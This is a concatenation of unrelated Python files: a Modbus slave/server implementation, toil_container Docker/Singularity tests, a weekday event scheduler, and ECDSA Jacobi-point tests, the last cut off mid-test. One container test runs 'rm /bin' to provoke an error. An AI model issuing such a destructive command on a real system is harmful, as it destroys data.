def get_timeout(self):
"""Gets the current value of the MAC layer timeout"""
return self._timeout
class ModbusBlock(object):
"""This class represents the values for a range of addresses"""
def __init__(self, starting_address, size, name=''):
"""
Contructor: defines the address range and creates the array of values
"""
self.starting_address = starting_address
self._data = [0] * size
self.size = len(self._data)
def is_in(self, starting_address, size):
"""
Returns true if a block with the given address and size
would overlap this block
"""
if starting_address > self.starting_address:
return (self.starting_address + self.size) > starting_address
elif starting_address < self.starting_address:
return (starting_address + size) > self.starting_address
return True
def __getitem__(self, item):
""""""
return self._data.__getitem__(item)
def __setitem__(self, item, value):
""""""
call_hooks("modbus.ModbusBlock.setitem", (self, item, value))
return self._data.__setitem__(item, value)
class Slave(object):
"""
This class define a modbus slave which is in charge of making the action
asked by a modbus query
"""
def __init__(self, slave_id, unsigned=True, memory=None):
"""Constructor"""
self._id = slave_id
# treat every value written to/read from register as an unsigned value
self.unsigned = unsigned
# the map registring all blocks of the slave
self._blocks = {}
# a shortcut to find blocks per type
if memory is None:
self._memory = {
defines.COILS: [],
defines.DISCRETE_INPUTS: [],
defines.HOLDING_REGISTERS: [],
defines.ANALOG_INPUTS: [],
}
else:
self._memory = memory
# a lock for mutual access to the _blocks and _memory maps
self._data_lock = threading.RLock()
# map modbus function code to a function:
self._fn_code_map = {
defines.READ_COILS: self._read_coils,
defines.READ_DISCRETE_INPUTS: self._read_discrete_inputs,
defines.READ_INPUT_REGISTERS: self._read_input_registers,
defines.READ_HOLDING_REGISTERS: self._read_holding_registers,
defines.WRITE_SINGLE_COIL: self._write_single_coil,
defines.WRITE_SINGLE_REGISTER: self._write_single_register,
defines.WRITE_MULTIPLE_COILS: self._write_multiple_coils,
defines.WRITE_MULTIPLE_REGISTERS: self._write_multiple_registers,
}
def _get_block_and_offset(self, block_type, address, length):
"""returns the block and offset corresponding to the given address"""
for block in self._memory[block_type]:
if address >= block.starting_address:
offset = address - block.starting_address
if block.size >= offset + length:
return block, offset
raise ModbusError(defines.ILLEGAL_DATA_ADDRESS)
def _read_digital(self, block_type, request_pdu):
"""read the value of coils and discrete inputs"""
(starting_address, quantity_of_x) = struct.unpack(">HH", request_pdu[1:5])
if (quantity_of_x <= 0) or (quantity_of_x > 2000):
# maximum allowed size is 2000 bits in one reading
raise ModbusError(defines.ILLEGAL_DATA_VALUE)
block, offset = self._get_block_and_offset(block_type, starting_address, quantity_of_x)
values = block[offset:offset+quantity_of_x]
# pack bits in bytes
byte_count = quantity_of_x // 8
if (quantity_of_x % 8) > 0:
byte_count += 1
# write the response header
response = struct.pack(">B", byte_count)
i, byte_value = 0, 0
for coil in values:
if coil:
byte_value += (1 << i)
if i >= 7:
# write the values of 8 bits in a byte
response += struct.pack(">B", byte_value)
# reset the counters
i, byte_value = 0, 0
else:
i += 1
# if there is remaining bits: add one more byte with their values
if i > 0:
fmt = "B" if self.unsigned else "b"
response += struct.pack(">"+fmt, byte_value)
return response
def _read_coils(self, request_pdu):
"""handle read coils modbus function"""
call_hooks("modbus.Slave.handle_read_coils_request", (self, request_pdu))
return self._read_digital(defines.COILS, request_pdu)
def _read_discrete_inputs(self, request_pdu):
"""handle read discrete inputs modbus function"""
call_hooks("modbus.Slave.handle_read_discrete_inputs_request", (self, request_pdu))
return self._read_digital(defines.DISCRETE_INPUTS, request_pdu)
def _read_registers(self, block_type, request_pdu):
"""read the value of holding and input registers"""
(starting_address, quantity_of_x) = struct.unpack(">HH", request_pdu[1:5])
if (quantity_of_x <= 0) or (quantity_of_x > 125):
# maximum allowed size is 125 registers in one reading
LOGGER.debug("quantity_of_x is %d", quantity_of_x)
raise ModbusError(defines.ILLEGAL_DATA_VALUE)
# look for the block corresponding to the request
block, offset = self._get_block_and_offset(block_type, starting_address, quantity_of_x)
# get the values
values = block[offset:offset+quantity_of_x]
# write the response header
response = struct.pack(">B", 2 * quantity_of_x)
# add the values of every register on 2 bytes
for reg in values:
fmt = "H" if self.unsigned else "h"
response += struct.pack(">"+fmt, reg)
return response
def _read_holding_registers(self, request_pdu):
"""handle read coils modbus function"""
call_hooks("modbus.Slave.handle_read_holding_registers_request", (self, request_pdu))
return self._read_registers(defines.HOLDING_REGISTERS, request_pdu)
def _read_input_registers(self, request_pdu):
"""handle read coils modbus function"""
call_hooks("modbus.Slave.handle_read_input_registers_request", (self, request_pdu))
return self._read_registers(defines.ANALOG_INPUTS, request_pdu)
def _write_multiple_registers(self, request_pdu):
"""execute modbus function 16"""
call_hooks("modbus.Slave.handle_write_multiple_registers_request", (self, request_pdu))
# get the starting address and the number of items from the request pdu
(starting_address, quantity_of_x, byte_count) = struct.unpack(">HHB", request_pdu[1:6])
if (quantity_of_x <= 0) or (quantity_of_x > 123) or (byte_count != (quantity_of_x * 2)):
# maximum allowed size is 123 registers in one reading
raise ModbusError(defines.ILLEGAL_DATA_VALUE)
# look for the block corresponding to the request
block, offset = self._get_block_and_offset(defines.HOLDING_REGISTERS, starting_address, quantity_of_x)
count = 0
for i in range(quantity_of_x):
count += 1
fmt = "H" if self.unsigned else "h"
block[offset+i] = struct.unpack(">"+fmt, request_pdu[6+2*i:8+2*i])[0]
return struct.pack(">HH", starting_address, count)
def _write_multiple_coils(self, request_pdu):
"""execute modbus function 15"""
call_hooks("modbus.Slave.handle_write_multiple_coils_request", (self, request_pdu))
# get the starting address and the number of items from the request pdu
(starting_address, quantity_of_x, byte_count) = struct.unpack(">HHB", request_pdu[1:6])
expected_byte_count = quantity_of_x // 8
if (quantity_of_x % 8) > 0:
expected_byte_count += 1
if (quantity_of_x <= 0) or (quantity_of_x > 1968) or (byte_count != expected_byte_count):
# maximum allowed size is 1968 coils
raise ModbusError(defines.ILLEGAL_DATA_VALUE)
# look for the block corresponding to the request
block, offset = self._get_block_and_offset(defines.COILS, starting_address, quantity_of_x)
count = 0
for i in range(byte_count):
if count >= quantity_of_x:
break
fmt = "B" if self.unsigned else "b"
(byte_value, ) = struct.unpack(">"+fmt, request_pdu[6+i:7+i])
for j in range(8):
if count >= quantity_of_x:
break
if byte_value & (1 << j):
block[offset+i*8+j] = 1
else:
block[offset+i*8+j] = 0
count += 1
return struct.pack(">HH", starting_address, count)
def _write_single_register(self, request_pdu):
"""execute modbus function 6"""
call_hooks("modbus.Slave.handle_write_single_register_request", (self, request_pdu))
fmt = "H" if self.unsigned else "h"
(data_address, value) = struct.unpack(">H"+fmt, request_pdu[1:5])
block, offset = self._get_block_and_offset(defines.HOLDING_REGISTERS, data_address, 1)
block[offset] = value
# returns echo of the command
return request_pdu[1:]
def _write_single_coil(self, request_pdu):
"""execute modbus function 5"""
call_hooks("modbus.Slave.handle_write_single_coil_request", (self, request_pdu))
(data_address, value) = struct.unpack(">HH", request_pdu[1:5])
block, offset = self._get_block_and_offset(defines.COILS, data_address, 1)
if value == 0:
block[offset] = 0
elif value == 0xff00:
block[offset] = 1
else:
raise ModbusError(defines.ILLEGAL_DATA_VALUE)
# returns echo of the command
return request_pdu[1:]
def handle_request(self, request_pdu, broadcast=False):
"""
parse the request pdu, makes the corresponding action
and returns the response pdu
"""
# thread-safe
with self._data_lock:
try:
retval = call_hooks("modbus.Slave.handle_request", (self, request_pdu))
if retval is not None:
return retval
# get the function code
(function_code, ) = struct.unpack(">B", request_pdu[0:1])
# check if the function code is valid. If not returns error response
if function_code not in self._fn_code_map:
raise ModbusError(defines.ILLEGAL_FUNCTION)
# if read query is broadcasted raises an error
cant_be_broadcasted = (
defines.READ_COILS,
defines.READ_DISCRETE_INPUTS,
defines.READ_INPUT_REGISTERS,
defines.READ_HOLDING_REGISTERS
)
if broadcast and (function_code in cant_be_broadcasted):
raise ModbusInvalidRequestError("Function %d can not be broadcasted" % function_code)
# execute the corresponding function
response_pdu = self._fn_code_map[function_code](request_pdu)
if response_pdu:
if broadcast:
call_hooks("modbus.Slave.on_handle_broadcast", (self, response_pdu))
LOGGER.debug("broadcast: %s", get_log_buffer("!!", response_pdu))
return ""
else:
return struct.pack(">B", function_code) + response_pdu
raise Exception("No response for function %d" % function_code)
except ModbusError as excpt:
LOGGER.debug(str(excpt))
call_hooks("modbus.Slave.on_exception", (self, function_code, excpt))
return struct.pack(">BB", function_code+128, excpt.get_exception_code())
def add_block(self, block_name, block_type, starting_address, size):
"""Add a new block identified by its name"""
# thread-safe
with self._data_lock:
if size <= 0:
raise InvalidArgumentError("size must be a positive number")
if starting_address < 0:
raise InvalidArgumentError("starting address must be zero or positive number")
if block_name in self._blocks:
raise DuplicatedKeyError("Block {0} already exists. ".format(block_name))
if block_type not in self._memory:
raise InvalidModbusBlockError("Invalid block type {0}".format(block_type))
# check that the new block doesn't overlap an existing block
# it means that only 1 block per type must correspond to a given address
# for example: it must not have 2 holding registers at address 100
index = 0
for i in range(len(self._memory[block_type])):
block = self._memory[block_type][i]
if block.is_in(starting_address, size):
raise OverlapModbusBlockError(
"Overlap block at {0} size {1}".format(block.starting_address, block.size)
)
if block.starting_address > starting_address:
index = i
break
# if the block is ok: register it
self._blocks[block_name] = (block_type, starting_address)
# add it in the 'per type' shortcut
self._memory[block_type].insert(index, ModbusBlock(starting_address, size, block_name))
def remove_block(self, block_name):
"""
Remove the block with the given name.
Raise an exception if not found
"""
# thread safe
with self._data_lock:
block = self._get_block(block_name)
# the block has been found: remove it from the shortcut
block_type = self._blocks.pop(block_name)[0]
self._memory[block_type].remove(block)
def remove_all_blocks(self):
"""
Remove all the blocks
"""
# thread safe
with self._data_lock:
self._blocks.clear()
for key in self._memory:
self._memory[key] = []
def _get_block(self, block_name):
"""Find a block by its name and raise and exception if not found"""
if block_name not in self._blocks:
raise MissingKeyError("block {0} not found".format(block_name))
(block_type, starting_address) = self._blocks[block_name]
for block in self._memory[block_type]:
if block.starting_address == starting_address:
return block
raise Exception("Bug?: the block {0} is not registered properly in memory".format(block_name))
def set_values(self, block_name, address, values):
"""
Set the values of the items at the given address
If values is a list or a tuple, the value of every item is written
If values is a number, only one value is written
"""
# thread safe
with self._data_lock:
block = self._get_block(block_name)
# the block has been found
# check that it doesn't write out of the block
offset = address-block.starting_address
size = 1
if isinstance(values, list) or isinstance(values, tuple):
size = len(values)
if (offset < 0) or ((offset + size) > block.size):
raise OutOfModbusBlockError(
"address {0} size {1} is out of block {2}".format(address, size, block_name)
)
# if Ok: write the values
if isinstance(values, list) or isinstance(values, tuple):
block[offset:offset+len(values)] = values
else:
block[offset] = values
def get_values(self, block_name, address, size=1):
"""
return the values of n items at the given address of the given block
"""
# thread safe
with self._data_lock:
block = self._get_block(block_name)
# the block has been found
# check that it doesn't write out of the block
offset = address - block.starting_address
if (offset < 0) or ((offset + size) > block.size):
raise OutOfModbusBlockError(
"address {0} size {1} is out of block {2}".format(address, size, block_name)
)
# returns the values
if size == 1:
return tuple([block[offset], ])
else:
return tuple(block[offset:offset+size])
class Databank(object):
"""A databank is a shared place containing the data of all slaves"""
def __init__(self, error_on_missing_slave=True):
"""Constructor"""
# the map of slaves by ids
self._slaves = {}
# protect access to the map of slaves
self._lock = threading.RLock()
self.error_on_missing_slave = error_on_missing_slave
def add_slave(self, slave_id, unsigned=True, memory=None):
"""Add a new slave with the given id"""
with self._lock:
if (slave_id <= 0) or (slave_id > 255):
raise Exception("Invalid slave id {0}".format(slave_id))
if slave_id not in self._slaves:
self._slaves[slave_id] = Slave(slave_id, unsigned, memory)
return self._slaves[slave_id]
else:
raise DuplicatedKeyError("Slave {0} already exists".format(slave_id))
def get_slave(self, slave_id):
"""Get the slave with the given id"""
with self._lock:
if slave_id in self._slaves:
return self._slaves[slave_id]
else:
raise MissingKeyError("Slave {0} doesn't exist".format(slave_id))
def remove_slave(self, slave_id):
"""Remove the slave with the given id"""
with self._lock:
if slave_id in self._slaves:
self._slaves.pop(slave_id)
else:
raise MissingKeyError("Slave {0} already exists".format(slave_id))
def remove_all_slaves(self):
"""clean the list of slaves"""
with self._lock:
self._slaves.clear()
def handle_request(self, query, request):
"""
when a request is received, handle it and returns the response pdu
"""
request_pdu = ""
try:
# extract the pdu and the slave id
(slave_id, request_pdu) = query.parse_request(request)
# get the slave and let him executes the action
if slave_id == 0:
# broadcast
for key in self._slaves:
self._slaves[key].handle_request(request_pdu, broadcast=True)
return
else:
try:
slave = self.get_slave(slave_id)
except MissingKeyError:
if self.error_on_missing_slave:
raise
else:
return ""
response_pdu = slave.handle_request(request_pdu)
# make the full response
response = query.build_response(response_pdu)
return response
except ModbusInvalidRequestError as excpt:
# Request is invalid, do not send any response
LOGGER.error("invalid request: " + str(excpt))
return ""
except MissingKeyError as excpt:
# No slave with this ID in server, do not send any response
LOGGER.error("handle request failed: " + str(excpt))
return ""
except Exception as excpt:
call_hooks("modbus.Databank.on_error", (self, excpt, request_pdu))
LOGGER.error("handle request failed: " + str(excpt))
# If the request was not handled correctly, return a server error response
func_code = 1
if len(request_pdu) > 0:
(func_code, ) = struct.unpack(">B", request_pdu[0:1])
return struct.pack(">BB", func_code + 0x80, defines.SLAVE_DEVICE_FAILURE)
class Server(object):
"""
This class owns several slaves and defines an interface
to be implemented for a TCP or RTU server
"""
def __init__(self, databank=None):
"""Constructor"""
# never use a mutable type as default argument
self._databank = databank if databank else Databank()
self._verbose = False
self._thread = None
self._go = None
self._make_thread()
def _do_init(self):
"""executed before the server starts: to be overridden"""
pass
def _do_exit(self):
"""executed after the server stops: to be overridden"""
pass
def _do_run(self):
"""main function of the server: to be overridden"""
pass
def _make_thread(self):
"""create the main thread of the server"""
self._thread = threading.Thread(target=Server._run_server, args=(self,))
self._go = threading.Event()
def set_verbose(self, verbose):
"""if verbose is true the sent and received packets will be logged"""
self._verbose = verbose
def get_db(self):
"""returns the databank"""
return self._databank
def add_slave(self, slave_id, unsigned=True, memory=None):
"""add slave to the server"""
return self._databank.add_slave(slave_id, unsigned, memory)
def get_slave(self, slave_id):
"""get the slave with the given id"""
return self._databank.get_slave(slave_id)
def remove_slave(self, slave_id):
"""remove the slave with the given id"""
self._databank.remove_slave(slave_id)
def remove_all_slaves(self):
"""remove the slave with the given id"""
self._databank.remove_all_slaves()
def _make_query(self):
"""
Returns an instance of a Query subclass implementing
the MAC layer protocol
"""
raise NotImplementedError()
def start(self):
"""Start the server. It will handle request"""
self._go.set()
self._thread.start()
def stop(self):
"""stop the server. It doesn't handle request anymore"""
if self._thread.is_alive():
self._go.clear()
self._thread.join()
def _run_server(self):
"""main function of the main thread"""
try:
self._do_init()
while self._go.isSet():
self._do_run()
LOGGER.debug("%s has stopped", self.__class__)
self._do_exit()
except Exception as excpt:
LOGGER.error("server error: %s", str(excpt))
# make possible to rerun in future
self._make_thread()
def _handle(self, request):
"""handle a received sentence"""
if self._verbose:
LOGGER.debug(get_log_buffer("-->", request))
# gets a query for analyzing the request
query = self._make_query()
retval = call_hooks("modbus.Server.before_handle_request", (self, request))
if retval:
request = retval
response = self._databank.handle_request(query, request)
retval = call_hooks("modbus.Server.after_handle_request", (self, response))
if retval:
response = retval
if response and self._verbose:
LOGGER.debug(get_log_buffer("<--", response))
return response
|
test_containers.py | """toil_container containers tests."""
from multiprocessing import Process
from os.path import join
import getpass
import os
import docker
import pytest
from toil_container import __version__
from toil_container import exceptions
from toil_container.containers import _TMP_PREFIX
from toil_container.containers import _remove_docker_container
from toil_container.containers import docker_call
from toil_container.containers import singularity_call
from .utils import DOCKER_IMAGE
from .utils import ROOT
from .utils import SINGULARITY_IMAGE
from .utils import SKIP_DOCKER
from .utils import SKIP_SINGULARITY
from .utils import Capturing
def assert_option_check_output(call, img):
# test check_output True
assert "bin" in call(img, args=["ls", "/"], check_output=True)
# test toil_container.ContainerError is raised with bad command
with pytest.raises(exceptions.ContainerError) as error:
call(img, args=["rm", "/bin"])
assert "raised during the container system call" in str(error.value)
def assert_option_cwd(call, img):
assert "bin" in call(img, ["ls", ".."], cwd="/bin", check_output=True)
def assert_option_env(call, img):
args = ["bash", "-c", "echo $FOO"]
assert "BAR" in call(img, args, env={"FOO": "BAR"}, check_output=True)
# check container doesn't inherit environment
os.environ["FOO"] = "BAR"
args = ["bash", "-c", "echo $FOO"]
assert "BAR" not in call(img, args, check_output=True)
def assert_parallel_call(call, img):
p1 = Process(target=lambda: call(img, ["sleep", "1"]))
p2 = Process(target=lambda: call(img, ["sleep", "1"]))
p1.start()
p2.start()
p1.join()
p2.join()
def assert_option_volumes(call, img, tmpdir):
vsrc = tmpdir.strpath
fsrc = tmpdir.join("foo")
vdst = join(os.sep, "SHARED")
fdst = join(vdst, "foo")
call(img, ["bash", "-c", "echo bar > " + fdst], volumes=[(vsrc, vdst)])
assert "bar" in fsrc.read()
def assert_option_working_dir(call, img, tmpdir):
args = ["bash", "-c", "echo bar > /tmp/foo"]
dont_remove = tmpdir.mkdir("dont")
call(img, args, working_dir=dont_remove.strpath, remove_tmp_dir=False)
tmpfile = next(dont_remove.visit(_TMP_PREFIX + "*/foo"))
assert "bar" in tmpfile.read()
remove = tmpdir.mkdir("remove")
call(img, args, working_dir=remove.strpath, remove_tmp_dir=True)
assert not list(remove.visit(_TMP_PREFIX + "*"))
@SKIP_DOCKER
def test_docker_check_output_false_prints_to_stdout_and_stderr():
with Capturing() as output:
exit_status = docker_call(DOCKER_IMAGE, args=["ls", "/"])
assert exit_status == 0
assert "bin" in " ".join(output) # check stdout and stderr are printed
@SKIP_DOCKER
def test_docker_check_output():
assert_option_check_output(docker_call, DOCKER_IMAGE)
@SKIP_DOCKER
def test_docker_cwd():
assert_option_cwd(docker_call, DOCKER_IMAGE)
@SKIP_DOCKER
def test_docker_env():
assert_option_env(docker_call, DOCKER_IMAGE)
@SKIP_DOCKER
def test_docker_parallel():
assert_parallel_call(docker_call, DOCKER_IMAGE)
@SKIP_DOCKER
def test_docker_volumes(tmpdir):
assert_option_volumes(docker_call, DOCKER_IMAGE, tmpdir)
@SKIP_DOCKER
def test_docker_working_dir(tmpdir):
assert_option_working_dir(docker_call, DOCKER_IMAGE, tmpdir)
@SKIP_SINGULARITY
def test_singularity_check_output():
assert_option_check_output(singularity_call, SINGULARITY_IMAGE)
@SKIP_SINGULARITY
def test_singularity_cwd():
assert_option_cwd(singularity_call, SINGULARITY_IMAGE)
@SKIP_SINGULARITY
def test_singularity_env():
assert_option_env(singularity_call, SINGULARITY_IMAGE)
@SKIP_SINGULARITY
def test_singularity_parallel():
assert_parallel_call(singularity_call, SINGULARITY_IMAGE)
@SKIP_SINGULARITY
def test_singularity_volumes(tmpdir):
assert_option_volumes(singularity_call, SINGULARITY_IMAGE, tmpdir)
@SKIP_SINGULARITY
def test_singularity_working_dir(tmpdir):
assert_option_working_dir(singularity_call, SINGULARITY_IMAGE, tmpdir)
@SKIP_SINGULARITY
def test_singularity_doesnt_overwrite_home():
args = ["bash", "-c", "ls /home"]
skip = ".singularity/docker"
output = singularity_call(SINGULARITY_IMAGE, args, check_output=True)
output = "".join(i for i in output.split() if skip not in i)
assert getpass.getuser() not in output
@SKIP_DOCKER
def test_remove_docker_container():
name = "florentino-ariza"
client = docker.from_env(version="auto")
container = client.containers.create(DOCKER_IMAGE, ["ls"], name=name)
container.start()
_remove_docker_container(name)
with pytest.raises(docker.errors.NotFound) as error:
client.containers.get(name)
assert name in str(error.value)
@SKIP_DOCKER
def test_docker_container():
python_args = "from toil_container import __version__; print(__version__)"
args = ["python", "-c", python_args]
image_tag = "test-toil-container-image"
client = docker.from_env(version="auto")
client.images.build(path=ROOT, rm=True, tag=image_tag)
assert __version__ in docker_call(image_tag, args, check_output=True)
|
scheduler.py | import datetime
import schedule
import time
import threading
class Interval:
daily = "daily"
workdays = "workdays"
weekday = "weekday"
@staticmethod
def list():
return ["daily", "workdays", "weekday"]
class Day:
Sunday = "Sunday"
Monday = "Monday"
Tuesday = "Tuesday"
Wednesday = "Wednesday"
Thursday = "Thursday"
Friday = "Friday"
Saturday = "Saturday"
@staticmethod
def list():
return ["Sunday", "Monday", "Tuesday", "Wednesday",
"Thursday", "Friday", "Saturday"]
@staticmethod
def workDays():
return ["Monday", "Tuesday", "Wednesday",
"Thursday", "Friday"]
_intervals = {
Interval.daily: [],
Interval.workdays: [],
Interval.weekday: Day.list()
}
class ScheduleInitException(Exception):
pass
TIME_FMT = "%H:%M:%S"
class Schedule:
"""Schedule time, interval and interval argument if needed."""
def __init__(self, time: datetime.time, interval: str, interval_arg=None):
if _intervals[interval]:
if not interval_arg in _intervals[interval]:
raise ScheduleInitException("Incorrect interval argument.")
else:
if interval_arg:
raise ScheduleInitException("Incorrect interval argument.")
if not isinstance(time, datetime.time):
raise ScheduleInitException("Time must be datetime.time")
self.time = time
self.interval = interval
self.interval_arg = interval_arg
def time_str(self, fmt=TIME_FMT):
return self.time.strftime(fmt)
def json(self):
r = self.__dict__.copy()
r["time"] = self.time_str()
return r
class Event:
def __init__(self, name, schedule):
self.name = name
self.schedule = schedule
def _schedule_run_pending(_schedule):
while True:
_schedule.run_pending()
time.sleep(1)
def _run_event_non_blocking(runner, arg, name):
t = threading.Thread(group=None, target=runner, args=(arg, name),
daemon=True)
t.start()
def _scheduler_runner(*args):
sched, event = args[0]
_run_event_non_blocking(sched.job_runner, sched.job_runner_arg, event.name)
class Scheduler:
def __init__(self, runner, runner_arg):
self.jobs = {} # {name: [job,]}
self.job_runner = runner
self.job_runner_arg = runner_arg
self._s = schedule.Scheduler()
self._run_scheduler_non_blocking()
def __del__(self):
self._s.clear()
def _run_scheduler_non_blocking(self):
self._t = threading.Thread(group=None, target=_schedule_run_pending,
args=(self._s,), daemon=True)
self._t.start()
def _add_job(self, name, job):
if name in self.jobs:
self.jobs[name].append(job)
else:
self.jobs.update({name: [job]})
def schedule_event(self, event: Event):
t = event.schedule.time_str()
if event.schedule.interval == Interval.daily:
j = self._s.every().day.at(t).do(_scheduler_runner, (self, event))
self._add_job(event.name, j)
elif event.schedule.interval == Interval.weekday:
weekday = event.schedule.interval_arg.lower()
sched_day = getattr(self._s.every(), weekday)
j = sched_day.at(t).do(_scheduler_runner, (self, event))
self._add_job(event.name, j)
elif event.schedule.interval == Interval.workdays:
for day in Day.workDays():
sched_day = getattr(self._s.every(), day.lower())
j = sched_day.at(t).do(_scheduler_runner, (self, event))
self._add_job(event.name, j)
def cancel_events(self, name):
if jobs := self.jobs.get(name):
for j in jobs:
self._s.cancel_job(j)
del self.jobs[name]
def next_run(self):
return self._s.next_run |
test_jacobi.py | import pickle
try:
import unittest2 as unittest
except ImportError:
import unittest
import os
import sys
import signal
import pytest
import threading
import platform
import hypothesis.strategies as st
from hypothesis import given, assume, settings, example
from .ellipticcurve import CurveFp, PointJacobi, INFINITY
from .ecdsa import (
generator_256,
curve_256,
generator_224,
generator_brainpoolp160r1,
curve_brainpoolp160r1,
generator_112r2,
)
from .numbertheory import inverse_mod
from .util import randrange
NO_OLD_SETTINGS = {}
if sys.version_info > (2, 7): # pragma: no branch
NO_OLD_SETTINGS["deadline"] = 5000
class TestJacobi(unittest.TestCase):
def test___init__(self):
curve = object()
x = 2
y = 3
z = 1
order = 4
pj = PointJacobi(curve, x, y, z, order)
self.assertEqual(pj.order(), order)
self.assertIs(pj.curve(), curve)
self.assertEqual(pj.x(), x)
self.assertEqual(pj.y(), y)
def test_add_with_different_curves(self):
p_a = PointJacobi.from_affine(generator_256)
p_b = PointJacobi.from_affine(generator_224)
with self.assertRaises(ValueError):
p_a + p_b
def test_compare_different_curves(self):
self.assertNotEqual(generator_256, generator_224)
def test_equality_with_non_point(self):
pj = PointJacobi.from_affine(generator_256)
self.assertNotEqual(pj, "value")
def test_conversion(self):
pj = PointJacobi.from_affine(generator_256)
pw = pj.to_affine()
self.assertEqual(generator_256, pw)
def test_single_double(self):
pj = PointJacobi.from_affine(generator_256)
pw = generator_256.double()
pj = pj.double()
self.assertEqual(pj.x(), pw.x())
self.assertEqual(pj.y(), pw.y())
def test_double_with_zero_point(self):
pj = PointJacobi(curve_256, 0, 0, 1)
pj = pj.double()
self.assertIs(pj, INFINITY)
def test_double_with_zero_equivalent_point(self):
pj = PointJacobi(curve_256, 0, curve_256.p(), 1)
pj = pj.double()
self.assertIs(pj, INFINITY)
def test_double_with_zero_equivalent_point_non_1_z(self):
pj = PointJacobi(curve_256, 0, curve_256.p(), 2)
pj = pj.double()
self.assertIs(pj, INFINITY)
def test_compare_with_affine_point(self):
pj = PointJacobi.from_affine(generator_256)
pa = pj.to_affine()
self.assertEqual(pj, pa)
self.assertEqual(pa, pj)
def test_to_affine_with_zero_point(self):
pj = PointJacobi(curve_256, 0, 0, 1)
pa = pj.to_affine()
self.assertIs(pa, INFINITY)
def test_add_with_affine_point(self):
pj = PointJacobi.from_affine(generator_256)
pa = pj.to_affine()
s = pj + pa
self.assertEqual(s, pj.double())
def test_radd_with_affine_point(self):
pj = PointJacobi.from_affine(generator_256)
pa = pj.to_affine()
s = pa + pj
self.assertEqual(s, pj.double())
def test_add_with_infinity(self):
pj = PointJacobi.from_affine(generator_256)
s = pj + INFINITY
self.assertEqual(s, pj)
def test_add_zero_point_to_affine(self):
pa = PointJacobi.from_affine(generator_256).to_affine()
pj = PointJacobi(curve_256, 0, 0, 1)
s = pj + pa
self.assertIs(s, pa)
def test_multiply_by_zero(self):
pj = PointJacobi.from_affine(generator_256)
pj = pj * 0
self.assertIs(pj, INFINITY)
def test_zero_point_multiply_by_one(self):
pj = PointJacobi(curve_256, 0, 0, 1)
pj = pj * 1
self.assertIs(pj, INFINITY)
def test_multiply_by_one(self):
pj = PointJacobi.from_affine(generator_256)
pw = generator_256 * 1
pj = pj * 1
self.assertEqual(pj.x(), pw.x())
self.assertEqual(pj.y(), pw.y())
def test_multiply_by_two(self):
pj = PointJacobi.from_affine(generator_256)
pw = generator_256 * 2
pj = pj * 2
self.assertEqual(pj.x(), pw.x())
self.assertEqual(pj.y(), pw.y())
def test_rmul_by_two(self):
pj = PointJacobi.from_affine(generator_256)
pw = generator_256 * 2
pj = 2 * pj
self.assertEqual(pj, pw)
def test_compare_non_zero_with_infinity(self):
pj = PointJacobi.from_affine(generator_256)
self.assertNotEqual(pj, INFINITY)
def test_compare_zero_point_with_infinity(self):
pj = PointJacobi(curve_256, 0, 0, 1)
self.assertEqual(pj, INFINITY)
def test_compare_double_with_multiply(self):
pj = PointJacobi.from_affine(generator_256)
dbl = pj.double()
mlpl = pj * 2
self.assertEqual(dbl, mlpl)
@settings(max_examples=10)
@given(
st.integers(
min_value=0, max_value=int(generator_brainpoolp160r1.order())
)
)
def test_multiplications(self, mul):
pj = PointJacobi.from_affine(generator_brainpoolp160r1)
pw = pj.to_affine() * mul
pj = pj * mul
self.assertEqual((pj.x(), pj.y()), (pw.x(), pw.y()))
self.assertEqual(pj, pw)
@settings(max_examples=10)
@given(
st.integers(
min_value=0, max_value=int(generator_brainpoolp160r1.order())
)
)
@example(0)
@example(int(generator_brainpoolp160r1.order()))
def test_precompute(self, mul):
precomp = generator_brainpoolp160r1
self.assertTrue(precomp._PointJacobi__precompute)
pj = PointJacobi.from_affine(generator_brainpoolp160r1)
a = precomp * mul
b = pj * mul
self.assertEqual(a, b)
@settings(max_examples=10)
@given(
st.integers(
min_value=1, max_value=int(generator_brainpoolp160r1.order())
),
st.integers(
min_value=1, max_value=int(generator_brainpoolp160r1.order())
),
)
@example(3, 3)
def test_add_scaled_points(self, a_mul, b_mul):
j_g = PointJacobi.from_affine(generator_brainpoolp160r1)
a = PointJacobi.from_affine(j_g * a_mul)
b = PointJacobi.from_affine(j_g * b_mul)
c = a + b
self.assertEqual(c, j_g * (a_mul + b_mul))
@settings(max_examples=10)
@given(
st.integers(
min_value=1, max_value=int(generator_brainpoolp160r1.order())
),
st.integers(
min_value=1, max_value=int(generator_brainpoolp160r1.order())
),
st.integers(min_value=1, max_value=int(curve_brainpoolp160r1.p() - 1)),
)
def test_add_one_scaled_point(self, a_mul, b_mul, new_z):
j_g = PointJacobi.from_affine(generator_brainpoolp160r1)
a = PointJacobi.from_affine(j_g * a_mul)
b = PointJacobi.from_affine(j_g * b_mul)
p = curve_brainpoolp160r1.p()
assume(inverse_mod(new_z, p))
new_zz = new_z * new_z % p
b = PointJacobi(
curve_brainpoolp160r1,
b.x() * new_zz % p,
b.y() * new_zz * new_z % p,
new_z,
)
c = a + b
self.assertEqual(c, j_g * (a_mul + b_mul))
@settings(max_examples=10)
@given(
st.integers(
min_value=1, max_value=int(generator_brainpoolp160r1.order())
),
st.integers(
min_value=1, max_value=int(generator_brainpoolp160r1.order())
),
st.integers(min_value=1, max_value=int(curve_brainpoolp160r1.p() - 1)),
)
@example(1, 1, 1)
@example(3, 3, 3)
@example(2, int(generator_brainpoolp160r1.order() - 2), 1)
@example(2, int(generator_brainpoolp160r1.order() - 2), 3)
def test_add_same_scale_points(self, a_mul, b_mul, new_z):
j_g = PointJacobi.from_affine(generator_brainpoolp160r1)
a = PointJacobi.from_affine(j_g * a_mul)
b = PointJacobi.from_affine(j_g * b_mul)
p = curve_brainpoolp160r1.p()
assume(inverse_mod(new_z, p))
new_zz = new_z * new_z % p
a = PointJacobi(
curve_brainpoolp160r1,
a.x() * new_zz % p,
a.y() * new_zz * new_z % p,
new_z,
)
b = PointJacobi(
curve_brainpoolp160r1,
b.x() * new_zz % p,
b.y() * new_zz * new_z % p,
new_z,
)
c = a + b
self.assertEqual(c, j_g * (a_mul + b_mul))
def test_add_same_scale_points_static(self):
j_g = generator_brainpoolp160r1
p = curve_brainpoolp160r1.p()
a = j_g * 11
a.scale()
z1 = 13
x = PointJacobi(
curve_brainpoolp160r1,
a.x() * z1 ** 2 % p,
a.y() * z1 ** 3 % p,
z1,
)
y = PointJacobi(
curve_brainpoolp160r1,
a.x() * z1 ** 2 % p,
a.y() * z1 ** 3 % p,
z1,
)
c = a + a
self.assertEqual(c, x + y)
@settings(max_examples=14)
@given(
st.integers(
